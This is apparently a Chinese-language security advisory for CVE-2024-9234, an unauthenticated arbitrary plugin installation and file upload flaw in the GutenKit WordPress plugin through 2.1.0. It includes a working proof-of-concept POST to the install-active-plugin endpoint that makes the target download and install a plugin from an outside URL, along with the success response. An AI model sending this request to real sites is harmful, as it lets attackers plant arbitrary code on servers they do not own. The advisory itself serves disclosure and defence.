GutenKit <= 2.1.0 - 未认证的任意文件上传
GutenKit——Gutenberg块编辑器的页面构建器块、模式和模板插件,由于在 install_and_activate_plugin_from_external() 函数(install-active-plugin REST API 端点)中缺少权限检查,在包括2.1.0版本内的所有版本中均存在任意文件上传漏洞。这使得未经身份验证的攻击者可以安装和激活任意插件,或者利用该功能上传伪装成插件的任意文件。
Type: plugin
CVSS Score: 9.8
CVE: CVE-2024-9234
Slug: gutenkit-blocks-addon
下载链接:下载 gutenkit-blocks-addon 版本 2.1.0
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
Content-Type: application/json
Content-Length: 114
{
"plugin": "https://downloads.wordpress.org/plugin/popularis-extra.1.2.6.zip",
"slug": "popularis-extra"
}
{"success":true,"data":"Plugin installed successfully!"}